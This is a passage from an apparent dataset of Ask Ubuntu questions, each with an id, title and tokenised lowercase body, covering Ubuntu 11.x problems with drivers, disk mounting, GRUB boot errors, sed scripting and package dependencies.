to synaptic , chose the remaining items from the ppa associated with sun jdk6 and installed them . the only remaining steps were to remove the open jdk ( from the ubuntu software centre ) and then to configure java as required by r ( the statistical programming environment for which i required java ) . i did this by running the command : r cmd javareconf . this set up the java configuration in /etc/r .
78674	screen tearing oddity when one window is on top of another with radeon	i have a mobility radeon 5850 running 11.04 and am running catalyst 11.10 drivers . i noticed that whenever i have two windows open , one of top of the other , scrolling results in minor screen tearing , usually around the border of the window on the bottom . when i minimize or close the bottom the tearing goes away . i have tear free desktop enabled and tried looking for this specific issue but could n't find anyone else with it . it happens in both unity and classic . is there any fix for this ? edit : the tearing does n't occur in xfce , so i 'm thinking it might be related to gnome or compiz
78675	how do i remove the fglrx drivers after i 've installed them by hand ?	i installed ati-driver-installer-11-9-x86.x86_64.run downloaded from the ati website . however i installed the generic version instead of building a distribution specific installer . now i have the gnome-shell graphic glitches that are associated with having the old fglrx drivers installed . how can i remove these drivers ? they do not show up in the additional drivers dialog , and i can not install any other drivers till these are removed .
78681	my ubuntu drive is running out of space , how to fix , something is wrong	i 'm moving from windows and am having trouble figuring this out : i 'm getting a message that pops up saying disk space is low . it says i have 800mb free . i click on the disk usage analyzer and it shows 24.6 total capacity and 22.5 used . when i look in gparted it shows a partition at 72.6gb where i have ubuntu installed . it also shows that 70.65gb used and 1.94 free in that partition . how do i figure out what else is in that partition ? it 's the only ext4 format . what am i missing ?
78682	how do i change to the noop scheduler ?	i have an ssd in my laptop and i 've been told that switching to the `` noop '' scheduler is preferred . how do i change to the noop scheduler , and where do i make the change so that it is persistent across reboots ?
78683	typing commands into a terminal always returns `` -bash : /usr/bin/python : is a directory ''	i think i messed something up on my ubuntu server while trying to upgrade to python 2.7.2 . every time i type in a command that does n't have a response , the default from bash is this : -bash : /usr/bin/python : is a directory just like it would say if i typed the name of a directory . but this happens every time i enter a command that does n't do anything . artur @ server : ~ $ dslkfjdsklfdshjk -bash : /usr/bin/python : is a directory i remember messing with the update-alternatives to point at python at some point , perhaps that could be it ? any inklings as to why this is happening ? related to this problem is also the fact that when i try using easy_install it tells me -bash : /usr/bin/easy_install : /usr/bin/python : bad interpeter : permission denied /etc/fstab/ is set to exec . i 've read that could fix the second problem but it has n't .
78689	unable to mount an external hard drive ( ntfs )	ubuntu 11.10 . when i plug my external drive western digital mypassport ( 500go ntfs ) i named wd . i get the following error : unable to mount wd error mounting : mount exited with exit code 1 : helper failed with : mount : according to mtab , /dev/sdb1 is already mounted on /media/wd mount failed i have no problem with the internal ntfs partitions that auto-mounts on startup ( ntfs-config does that ) . if i plug the wd before i boot ubuntu , upon login , it 's recognized and i can access without no problem . but if i remove it using ( safely remove ) and then replug it , i get the error above . here is my fstab : # /etc/fstab : static file system information . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # entry for /dev/sda5 : uuid=24540d0f-5803-493c-ace9-e3b3c0cedb26 / ext4 errors=remount-ro 0 1 # entry for /dev/sda3 : uuid=e4c43f7ec43f51d2 /media/os ntfs-3g defaults , locale=en_us.utf-8 0 0 # entry for /dev/sda2 : uuid=6a0070f10070c61b /media/recovery ntfs-3g defaults , locale=en_us.utf-8 0 0 # entry for /dev/sdb1 : uuid=ea6854d268549f5f /media/wd ntfs-3g defaults , nosuid , nodev , locale=en_us.utf-8 0 0 # entry for /dev/sda6 : uuid=ed077c52-c50e-406c-9120-9cb6f86ec204 none swap sw 0 0 here is my mtab /dev/sda5 / ext4 rw , errors=remount-ro , commit=0 0 0 proc /proc proc rw , noexec , nosuid , nodev 0 0 sysfs /sys sysfs rw , noexec , nosuid , nodev 0 0 fusectl /sys/fs/fuse/connections fusectl rw 0 0 none /sys/kernel/debug debugfs rw 0 0 none /sys/kernel/security securityfs rw 0 0 udev /dev devtmpfs rw , mode=0755 0 0 devpts /dev/pts devpts rw , noexec , nosuid , gid=5 , mode=0620 0 0 tmpfs /run tmpfs rw , noexec , nosuid , size=10 % , mode=0755 0 0 none /run/lock tmpfs rw , noexec , nosuid , nodev , size=5242880 0 0 none /run/shm tmpfs rw , nosuid , nodev 0 0 /dev/sda3 /media/os fuseblk rw , nosuid , nodev , allow_other , blksize=4096 0 0 /dev/sda2 /media/recovery fuseblk rw , nosuid , nodev , allow_other , blksize=4096 0 0 /dev/sdb1 /media/wd fuseblk rw , nosuid , nodev , allow_other , blksize=4096 0 0 binfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw , noexec , nosuid , nodev 0 0 gvfs-fuse-daemon /home/hanine/.gvfs fuse.gvfs-fuse-daemon rw , nosuid , nodev , user=hanine 0 0 appearently it can not be mounted because upon login , it finds that it is already mounted . some sort of conflict . does anyone have a clue on how to solve this . thanks .
78690	need help with exploring a usb drive	when i plug in a usb drive , i see it on the left hand edge of the unity desktop ( 11.10 , 64 bit ) but when i try to explore it , vlc starts and tries to play whatever it can find in the usb drive . this behavior began when i updated from 11.04 to 11.10 . i literally can not look into the contents of any of the usb drives i have , because i can not stop vlc , nor can i do anything when i click open other than watch vlc start up . this is very frustrating because it makes my usb sticks essentially useless . help ! i 'm sure that there is something a wizard could do about this , but i am not a wizard , and i am at my wits ends . trying to get to the system settings menu works , and i can see the setup for `` removable '' devices , and they are all set to `` ask '' but that is clearly not what is happening . so it looks like i must reach for the command line , but where do i go to find the settings for what the desktop does when i plug in a usb drive and wish to explore the file structure in it and possible copy a file into the usb or from the usb drive . right now , vlc media player is always getting in my way . : - (
78691	recovering user files with a live cd	for some reason my bootup is n't working . i get an error akin to `` operating system not found '' . so i tried bootrepair , and that did n't work . so then i decided i would just save my personal files , wipe everything , and reinstall . except when i go to the /home directory , my username folder is n't there , instead it goes to the live cd 's desktop and file folders . is there some other error occurring ? is there a way to recover the files ?
78696	how to monitor my wireless network ?	does anyone know how to find out who using my network other than me in ubuntu ? because i just want to make my wireless network being use only for the people i approve it ?
78705	how to set up an inter-os partition ?	i need a working partition configuration for use and accessibility on both ubuntu and windows . i have an 8gb usb flash drive onto which i am installing ubuntu 11.10 so that i can have a personal bootable os wherever i go . i 've installed ubuntu several times , but i just ca n't seem to get this one partition right . this is my own configuration : partition 1 : primary - 200mb - beginning - ext4 - /boot partition 2 : primary - 1300mb - end - swap area partition 3 : logical - 5200mb - beginning - ext4 - / partition 4 : logical - 1258mb - beginning - ext4 - /home partition 5 : logical - 42mb - end - fat32 ? - /windows ? what i want to do is to get partition 5 configured so i can access it on both the installed ubuntu system and a windows system ( when the usb drive is connected while windows is booted ) . basically , what i want is ubuntu installed on the usb drive along with a partition that i can access with other operating systems . i 'm thinking i just need the technical configuration of `` use as : '' and `` mount point : '' for my final partition . but i do n't know . any help with this is appreciated . and any other tips are appreciated as well .
78714	problem installing 10.04 on dell e6410	i get a blank screen screen on installation of ubuntu 10.04 on my dell latitude e6410 . it has the nvidia graphics card . i 'm sure someone else has had same problem but i need an answer a newbie can follow , please .
78717	i want my wobbly windows back ?	i enable wobbly windows in the ccsm but my windows are n't doing anything . help ... opengl 's on and everything . it worked on ubuntu 10.10 maverick meerkat .
78718	how to replace line with 3 lines / add 2 before found / add 2 before 1 from end	file is : # welcome to the file # this is a file and it ends on `` exit 0 '' # here are unknown number of lines exit 0 needs to have these lines one after each other : echo deadline > /sys/block/sda/queue/scheduler echo 1 > /sys/block/sda/queue/iosched/fifo_batch so it looks like this : # welcome to the file # this is a file and it ends on `` exit 0 '' # here are unknown number of lines echo deadline > /sys/block/sda/queue/scheduler echo 1 > /sys/block/sda/queue/iosched/fifo_batch exit 0 problems- command inside command inside command with many lines \n for now i have command sed -i 's/exit 0/echo deadline > /sys/block/sda/queue/scheduler\necho 1 > /sys/block/sda/queue/iosched/fifo_batch\nexit 0/gp ' /usr/file but something is wrong in it - it does n't work . update 1 '' slashes '' / to \/ : i found the solution for slashes to use \/ and backslashes \\ . so now my command works sed -i 's/exit 0/echo deadline > \/sys\/block\/sda\/queue\/scheduler\necho 1 > \/sys\/block\/sda\/queue\/iosched\/fifo_batch\nexit 0/ ' /usr/file but it needs to be modified cause now it finds all expressions but how so just that it finds a line having nothing else in it ? so it does n't replace whats in exit 0 in example files comment . update 2 at least line starting with ^ : found to make solution for this file sed 's/^exit 0/\necho deadline > \/sys\/block\/sda\/queue\/scheduler\necho 1 > \/sys\/block\/sda\/queue\/iosched\/fifo_batch\nexit 0/ ' /usr/file but in case text file has lines : exit 0 exit 0 means exiting then cant use ^ to find line starting with expression . so best way would be which i ca n't find how to find exact line containing just expression or find expression line and not all expressions ? update 3 exact line ^ & $ : tuns out ^ limits nothing to be on left side and $ nothing to be on right side so now working solution for 1. solution is sed -i 's/^exit 0 $ /\necho deadline > \/sys\/block\/sda\/queue\/scheduler\necho 1 > \/sys\/block\/sda\/queue\/iosched\/fifo_batch\nexit 0/ ' /usr/file i want to learn at least 3 ways using 1 line commands . how to : replace found line with 3 lines with symbol containing command as mentioned found complete line and not just expression and add 2 lines before found add 2 lines 1 line before end
78720	how can i install an android environment on my ubuntu system ?	i 'm wondering if there 's an environment for my ubuntu to try out android 3.0 . i just want to ! ! !
78725	how to browse to a local web site from my ubuntu desktop	i run a web server just on my local network on a windows xp machine using iis . the main app i created keeps track of all my bookmarks so that no matter which computer i 'm using in my home , i have super easy access to all my bookmarks via a well organized web site managed through a database . i just installed ubuntu 11.10 on a separate machine that i 'm rebuilding . currently , i 'm able to access files on the web server from ubuntu for file sharing purposes but firefox redirects me to a random site when i try to access the website like i normally do in windows . the url is similar to : http : //mywebserver/myapp/script.pl
78726	ubuntu one login error : `` org.freedesktop.secret.collection '' does n't exist	when i click on ubuntu one in the launcher and try to log in i get : method `` createitem '' with signature `` a { sv } ( oyay ) b '' on interface `` org.freedeskto.secret.collection '' does n't exist i do n't have a clue what this means or how to fix it . can any one offer any help ? i have a clean install of 11.10 on a 20gb partition of a 40gb hard drive . the other 20gb is for windows xp professional .
78727	openssh and openldap configuration	i have installed ubuntu server 11.10 . i have setup ldap with some users added . now i want to configure openssh to use this ldap details to login to server . and once a user logs in each user should have their respective home directory .
78730	how do i add a custom launcher ?	i started by searching guides . i found this guide but neither of the main methods works anymore in 11.10 . the first solution , i have created the desktop file , however the file location given as .gconf- > desktop- > unity- > launcher - > favourites no longer exists . i can get to /home/sayth/.gconf/desktop but there is no longer a unity folder . the second solution described right-clicking the desktop and creating a launcher . right-clicking the desktop no longer produces a `` create a launcher '' option . i manually installed geany 0.21 as the one in the repo 's is outdated . it 's installed and working correctly , and is executing from /usr/local/bin/geany . how can i add it to the launcher ?
78731	applying chgrp `` apache '' to entire directory failed	i 've been tried to change group of the whole directory with code example below [ bash terminal on ubuntu 11.10 ] : chgrp apache -r ./test1 but failed and said : chgrp : invalid group : `apache' user and group in httpd.conf is set to `` apache '' .
78736	rebuild package from upstream source ?	i 'm trying to rebuild a package ( specifically grub2 ) to overcome some bugs that have been fixed upstream but not fixed in ubuntu , and have the package integrate into ubuntu properly . the package is hosted in bzr both on launchpad and gnu savannah . how can convert a `` raw '' upstream source package into an `` ubuntu '' version and recompile/repackage it ? i 've worked out that i can get the latest ubuntu version of the package source with apt-get source , but there are significant differences to the upstream version . what is the best course of action here ?
78737	eclipse execute from home - eclipse.org version	due to a lot of minor errors with the eclipse from the repository ( can not install mylyn or pydev due to unmet dependencies ) i manually downloaded from eclipse.org . i have not had this problem before but when i go to ~/eclipse ( where i extracted the zip ) and try to run eclipse it will not run . from the command line i just get eclipse not installed use sudo apt-get to install it . i know i have java installed . sayth @ sayth-travelmate-5740g : ~ $ java -version java version `` 1.6.0_23 '' openjdk runtime environment ( icedtea6 1.11pre ) ( 6b23~pre10-0ubuntu5 ) openjdk server vm ( build 20.0-b11 , mixed mode ) how can i get eclipse to load normally ? edit i removed the openjdk and installed oracle java to /usr/java i then create a symbolic link sayth @ sayth-travelmate-5740g : ~/eclipse $ sudo ln -s /usr/java ~/eclipse/jre however still the error . sayth @ sayth-travelmate-5740g : ~/eclipse $ java eclipse.jar exception in thread `` main '' java.lang.noclassdeffounderror : eclipse/jar caused by : java.lang.classnotfoundexception : eclipse.jar at java.net.urlclassloader $ 1.run ( urlclassloader.java:217 ) at java.security.accesscontroller.doprivileged ( native method ) at java.net.urlclassloader.findclass ( urlclassloader.java:205 ) at java.lang.classloader.loadclass ( classloader.java:321 ) at sun.misc.launcher $ appclassloader.loadclass ( launcher.java:294 ) at java.lang.classloader.loadclass ( classloader.java:266 ) could not find the main class : eclipse.jar . program will exit .
78740	secure my root account	i want to know how to change the user name of my root account from root to xyz . also i want to know how to remove the option of boot into rescue mode from grub option at the boot time .
78741	degrading administrative privilege to standard with single admin user account	i recently met with a severe issue with user accounts . on my system , there is only one administrator user , named vivek . i added another user with name vivi and changed its privilege to administrator . afterwards , i changed the privilege for the vivek account to standard user . since vivek is being the current user , i dropped with all administrator privileges . no password was set for the new administrator user vivi and hence it was disabled by default . i no longer access to any administrative activities . later i corrected this by editing etc/group file . is n't this a severe bug ? being the current administrator user , how could i degrade myself to a standard user and got out from administrator 's seat ? i did not get any warning messages indicating no other administrators exists to manage my system . i suggest this warning should be included there in user accounts when an administrator user changes his privilege without any enabled administrators . your thoughts ?
78743	how to make a customized version of firefox ?	i want to make a customized firefox installer . can someone help ? basically i want to tweak the graphics and all the visual effects . it would be really helpful if someone pointed out some links .
78745	how to create an ask ubuntu search button in gnome-shell ?	on the overview in gnome-shell , there are two search buttons for google and wikipedia . is it possible to create a similar button for ask ubuntu ?
78749	what provides curses headers named curses.h ?	i need a few header file namely curses.h for text based programming please tell me how to install these header files .
78751	phpmyadmin says : $ cfg [ 'servers ' ] [ $ i ] [ 'userconfig ' ] ... not ok	i have installed phpmyadmin and it works fine . at the bottom of the pages however , there is this error message : the phpmyadmin configuration storage is not completely configured , some extended features have been deactivated . to find out why click here . in that page , the only red row is this : $ cfg [ 'servers ' ] [ $ i ] [ 'userconfig ' ] ... not ok [ documentation ] user preferences : disabled in the configuration i have this : $ cfg [ 'servers ' ] [ $ i ] [ 'userconfig ' ] = 'pma_userconfig ' ; the pma_userconfig was missing from my phpmyadmin db so i found the create_tables.sql from my phpmyadmin installation and i ran that , then restarted apache and mysql . the table has been created , but the error is not gone . thanks !
78755	which graphic or graphics card for 4 monitors ?	what is the recommended way of getting 4 monitors on my future computer ? is it best to get 2 graphics card with 2 dvi ports each ?
78758	unable to boot : missing operating system	i had installed ubuntu 11.10 along with the another ubuntu 11.10 which already installed in my netbook . later i formatted the partition i newly installed . next time when i boot it went to grub rescue menu . i boot my system again with ubuntu usb stick , then i installed boot repair package in usb and restored mbr and grub menu in hard disk . now when i am restarting , i am getting a message missing operating system , press any key to continue . can somebody help me on this ? below is the output for sudo fdisk -l omitting empty partition ( 7 ) disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00058a60 device boot start end blocks id system /dev/sda1 * 2048 204072287 102035120 83 linux /dev/sda2 204072958 312580095 54253569 5 extended /dev/sda5 310507520 312580095 1036288 82 linux swap / solaris /dev/sda6 308432896 310503423 1035264 82 linux swap / solaris partition table entries are not in disk order disk /dev/sdb : 4006 mb , 4006608896 bytes 124 heads , 62 sectors/track , 1017 cylinders , total 7825408 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0004d3df device boot start end blocks id system /dev/sdb1 * 62 7818695 3909317 b w95 fat32 below is the output for sudo blkid /dev/loop0 : type= '' squashfs '' /dev/loop1 : label= '' casper-rw '' uuid= '' 533defb1-f073-254a-b46f-7ca0ac1f4e0c '' type= '' ext2 '' /dev/sda1 : label= '' ubuntu '' uuid= '' 6a141040-3ba8-457a-9de5-ad06e6057084 '' type= '' ext4 '' /dev/sda5 : uuid= '' 3a7f62d6-9c65-4d12-a3b6-5d62b9710f7d '' type= '' swap '' /dev/sda6 : uuid= '' 274da115-cec2-4418-a1af-88fe921e3670 '' type= '' swap '' /dev/sdb1 : label= '' pendrive '' uuid= '' ec22-6be4 '' type= '' vfat '' file /boot/grub/grub.cfg # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod vbe insmod vga insmod video_bochs insmod video_cirrus } insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 6a141040-3ba8-457a-9de5-ad06e6057084 if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=auto load_video insmod gfxterm insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 6a141040-3ba8-457a-9de5-ad06e6057084 set locale_dir= ( $ root ) /boot/grub/locale set lang=en_us insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=10 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # if [ $ { recordfail } ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ linux_gfx_mode '' ! = `` text '' ] ; then load_video ; fi menuentry 'ubuntu , with linux 3.0.0-12-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail set gfxpayload= $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 6a141040-3ba8-457a-9de5-ad06e6057084 linux /boot/vmlinuz-3.0.0-12-generic root=uuid=6a141040-3ba8-457a-9de5-ad06e6057084 ro quiet splash vt.handoff=7 initrd /boot/initrd.img-3.0.0-12-generic } menuentry 'ubuntu , with linux 3.0.0-12-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 6a141040-3ba8-457a-9de5-ad06e6057084 echo 'loading linux 3.0.0-12-generic ... ' linux /boot/vmlinuz-3.0.0-12-generic root=uuid=6a141040-3ba8-457a-9de5-ad06e6057084 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.0.0-12-generic } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 6a141040-3ba8-457a-9de5-ad06e6057084 linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 6a141040-3ba8-457a-9de5-ad06e6057084 linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # #
78769	how can i set up a keyboard shortcut so that ctrl+backspace = del ?	as an old mac user , i am used to hitting ctrl+backspace , and the effect is the same as if i pressed del . i have recently purchased an asus n53sv laptop which has replaced my macbook , but unfortunately this laptop has a very annoying keyboard layout , where the del key is in a non standard position , and moreover it is tiny . is it possible to get the ctrl+backspace combination to issue a del and how would i do this ? using kubuntu , but i believe this is to be done at x level , not at desktop , am i right ? thanks !
78770	no empathy notifications with gnome shell 3.2	i installed the gnome shell 3.2. when i run empathy there is no icon in the notification area ( bottom-right ) and there 's not any notification but a sound . any help ?
78771	super slow ubuntu 11.10	well lately my 11.10 has been incredibly slow and i do n't know why . like everything is always really slow . moving windows across the screen or minimizing/maximizing is extremely slow . i do n't know if the animations or what , it 's just miserably slow . this was not happening in windows7 .
78774	sound from headphones and speakers ( in ubuntu 11.10 )	not sure what changed , but when i upgraded to ubuntu 11.10 my laptop ( acer aspire 3050 ) started to get problems with my headphones . now when i put headphones in is that the sound comes out of both the headphones and the laptop speakers , and that sound levels reset to maximum when i restart the laptop . i can turn off the speakers using alsamixer . i have also tried changing the settings in /etc/modprobe.d/alsa-base.conf but no joy so far .
78779	can not update eclipse due to conflicting dependencies	i installed eclipse via the ubuntu repos ( i 'm on ubuntu 11.10 ) . then i added the indigo repo ( http : //download.eclipse.org/releases/indigo/ ) as only helios repos were listed as part of the default install . if i go to help > check for updates then a number of updates are listed for install , however when i click next i get the following error : can not complete the install because of a conflicting dependency . software being installed : eclipse java development tools 3.7.1.r371_v20110810-0800-7z8gfcofmlftabvksr5qm9rbgebk ( org.eclipse.jdt.feature.group 3.7.1.r371_v20110810-0800-7z8gfcofmlftabvksr5qm9rbgebk ) software currently installed : shared profile 1.0.0.1317160468326 ( sharedprofile_platformprofile 1.0.0.1317160468326 ) only one of the following can be installed at once : jsch ui 1.1.300.dist ( org.eclipse.jsch.ui 1.1.300.dist ) jsch ui 1.1.300.i20110511-0800 ( org.eclipse.jsch.ui 1.1.300.i20110511-0800 ) can not satisfy dependency : from : shared profile 1.0.0.1317160468326 ( sharedprofile_platformprofile 1.0.0.1317160468326 ) to : org.eclipse.jsch.ui [ 1.1.300.dist ] can not satisfy dependency : from : eclipse java development tools 3.7.1.r371_v20110810-0800-7z8gfcofmlftabvksr5qm9rbgebk ( org.eclipse.jdt.feature.group 3.7.1.r371_v20110810-0800-7z8gfcofmlftabvksr5qm9rbgebk ) to : org.eclipse.platform.feature.group 3.7.1 can not satisfy dependency : from : eclipse platform 3.7.1.r37x_v20110729-9gf7uhoxftniv7mi3t556izn9au8bez1lhmcvk ( org.eclipse.platform.feature.group 3.7.1.r37x_v20110729-9gf7uhoxftniv7mi3t556izn9au8bez1lhmcvk ) to : org.eclipse.jsch.ui [ 1.1.300.i20110511-0800 ] i have tried fully removing eclipse and all config files and re-installing but that does n't help . i ca n't find any info from googling around either .
78780	how can i disable an audio hdmi device ?	powertop reports that intel cougarpoint hdmi is 100 % active and there are reports that this device consumes a lot of power . if that is so , i would like to disable it as i never use it . is there a way i can disable it ? i am using ubuntu 11.10
78785	how to control the mouse pointer via my keyboard ?	how to control ( or simulate ) my mouse pointer movements using keyboard shortcuts ( on ubuntu 11.10 ) .
78792	is this hardware configuration ubuntu 10.04 compatible ?	i am ready to buy these components for my new linux workstation . i am a software developer and i would like to create a multimonitor workstation like this one 1 - kvr1333d3n9k2/8 kingston kit 2*4gb ddr3-1333 pc3-10666 unbuffered 1 - st500dm002 seagate barracuda 7200.12 500gb 7200rpm 16mb sataiii 3.5 '' 1 - bx80623i52500k intel core i5 2500k 3.30ghz cache 6mb sandy bridge lga1155 box 1 - cafa70 corsair cooling cafa70 cpu dual cooler intel sk1366/1156/775 amd am2/am3 1 - rs700-ambad3-eu cooler master silent pro m700 700watt eps/atx12v modulare 20/24+4/8+6/8pin pfc attivo 80+ bronze 2 - zt-50401-10l zotac nvidia geforce gtx550 ti 1gb gddr5 192bit 2*dvi/hdmi/dp pci-ex 1 - sabertooth/p67 asus sabertooth p67 i7/i5/i3 sli/crossfire ddr3 glan usb 3.0 sk1155 atx
78798	is there an akonadi-enabled message notifier in kubuntu ( which does not require kmail running ) ?	imho one of the cool things about kde 's groupware cache akonadi is that it synchronises and indexes your mail even if there is no e-mail software running . i always thought that one of the prime motivations for this is a message notifier that does not require a running mail application . but there is no such thing ! or am i simply too stupid to find the settings ? things i am aware of : kmail 's native notifications , which only work with kmail running . plasmoids of imho somewhat poor quality , which do not work with akonadi and do not integrate as nicely into kde 's notification system . a set of plasmoids dubbed lion mail developed by sebastian kr端ger would do the job . however , i found neither packages nor source on the web and even kde pim developers apparently do n't have a clue about its status , so i assume it is dead . so : is there a mail notifier which only requires akonadi and integrates nicely into the plasma workspace ? please , i 'm desperate ! : )
78799	xubuntu has cursor issues	the newly installed xubuntu on my laptop on has synaptics touchpad installed . i face a strange problem that being my cursor automatically shifts to a random position while typing . ne idea what could be the reason
78804	i ca n't change the keybinding theme from emacs to default in gnome tweak tool	i am using ubuntu 11.10 gnome shell . i have changed the keybinding theme from default to emacs using gnome tweak tool . for some reason i ca n't change it back to default . has anyone encountered this issue before , and does anyone know how to fix it ?
78805	guest user ubuntu 11.10 guest user	how do i disable the guest user in ubuntu 11.10 when using sudo edit lightdm.conf i am not able to open the file thanks
78810	xubuntu video rendering issue	as i am playing avi videos on my newly installed xubuntu i observe video flickering because of which i do not get optimal user experience while watching videos . i have tried multiple players as well as multiple videos but the problem persists . the flickering doesnt exist when i am playing my video on win 7. info driver : - amd radeon 4500 propriety driver activated players tried : - mplayer , vlc
78816	command to see if a script was initiated	when waking up from sleep my laptop immediately connects to the wlan after i run the command iwlist eth1 scanning in the terminal . i tried to add the command to /usr/lib/pm-utils/sleep.de/55networkmanager and to /etc/pm/sleep.d/10_grub-common but no joy . is there a command that will give you a feedback that the script was initiated , so i can be sure that the script is running but not working as it should ?
78826	ca n't get activate_uri signal working when making a lens	i 'm trying to develop a lens for unity in ubuntu 11.10 and i can not get activate_uri signal working . this is an extract of my code : def _on_activate_uri ( self , scop , uri ) : print `` -- -- > `` + uri + `` < - '' ret=unity.activationresponse.new ( unity.handledtype.hide_dash , '' ) return ret and this is what i get back : typeerror : ca n't convert return value to desired type ../lens/appslens.py:230 : warning : g_object_get_qdata : assertion g_is_object ( object ) ' failed gobject.mainloop ( ) .run ( ) ../lens/appslens.py:230 : warning : g_object_set_qdata_full : assertiong_is_object ( object ) ' failed gobject.mainloop ( ) .run ( ) ../lens/appslens.py:230 : warning : g_object_unref : assertion `g_is_object ( object ) ' failed gobject.mainloop ( ) .run ( ) does anyone has an idea where is my mistake ? thanks in advance for your help
78828	slow dvd burning/reading speeds : how to solve	i have a problem on which i 'm struggling since i started using linux a year ago on my desktop , but still have n't found a solution for it . when reading or burning a dvd , the speeds are very slow ( mostly under 1x ) whilst i did selected the fastest speed in k3b . as such , it takes up to 40-50 minutes to burn one dvd ! i read about enabling dma this post but it did n't help . this is the output for dmesg | grep -i dma > [ 0.000000 ] dma 0x00000010 - > 0x00001000 [ 0.000000 ] dma32 0x00001000 - > 0x00100000 [ 0.000000 ] dma zone : 56 pages used for memmap [ 0.000000 ] dma zone : 5 pages reserved [ 0.000000 ] dma zone : 3921 pages , lifo batch:0 [ 0.000000 ] dma32 zone : 3527 pages used for memmap [ 0.000000 ] dma32 zone : 254441 pages , lifo batch:31 [ 0.000000 ] policy zone : dma32 [ 0.120356 ] pnp 00:01 : [ dma 4 ] [ 0.120968 ] pnp 00:05 : [ dma 2 ] [ 0.121421 ] pnp 00:06 : [ dma 3 ] [ 0.122617 ] pnp 00:0b : [ dma 0 disabled ] [ 0.852321 ] ata1 : sata max udma/133 cmd 0xec00 ctl 0xe480 bmdma 0xe000 irq 19 [ 0.852325 ] ata2 : sata max udma/133 cmd 0xe400 ctl 0xe080 bmdma 0xe008 irq 19 [ 0.861633 ] ata3 : pata max udma/133 cmd 0x1f0 ctl 0x3f6 bmdma 0xff00 irq 14 [ 0.861636 ] ata4 : pata max udma/133 cmd 0x170 ctl 0x376 bmdma 0xff08 irq 15 [ 1.329411 ] ata1.00 : ata-7 : maxtor 6v250f0 , va111630 , max udma/133 [ 1.345418 ] ata1.00 : configured for udma/133 [ 1.820606 ] ata4.00 : atapi : philips dvdr1660p1 , p1.3 , max udma/33 [ 1.820610 ] ata4.00 : warning : atapi dma disabled for reliability issues . it can be enabled [ 1.820613 ] ata4.00 : warning : via pata_ali.atapi_dma modparam or corresponding sysfs node . [ 1.836681 ] ata4.00 : configured for udma/33 [ 12.296600 ] parport0 : pc-style at 0x378 ( 0x778 ) , irq 7 , dma 3 [ pcspp , tristate , compat , epp , ecp , dma ] reading the third and fourth last line , i assume there is indeed a problem with dma ? edit : this question still is not solved . could anyone come up with an other solution please ? thanks
78829	how to remove clock from panel in gnome-shell ?	how to remove clock from the top panel in gnome-shell ?
78842	i ca n't access my internal hard drive through shortcut applet of cairo dock	after upgrading from ubuntu 11.04 to ubuntu 11.10 i ca n't access my internal hard drive through the shortcut applet in cairo-dock . whenever i try to open , banshee music player opens instead . how can i fix this ?
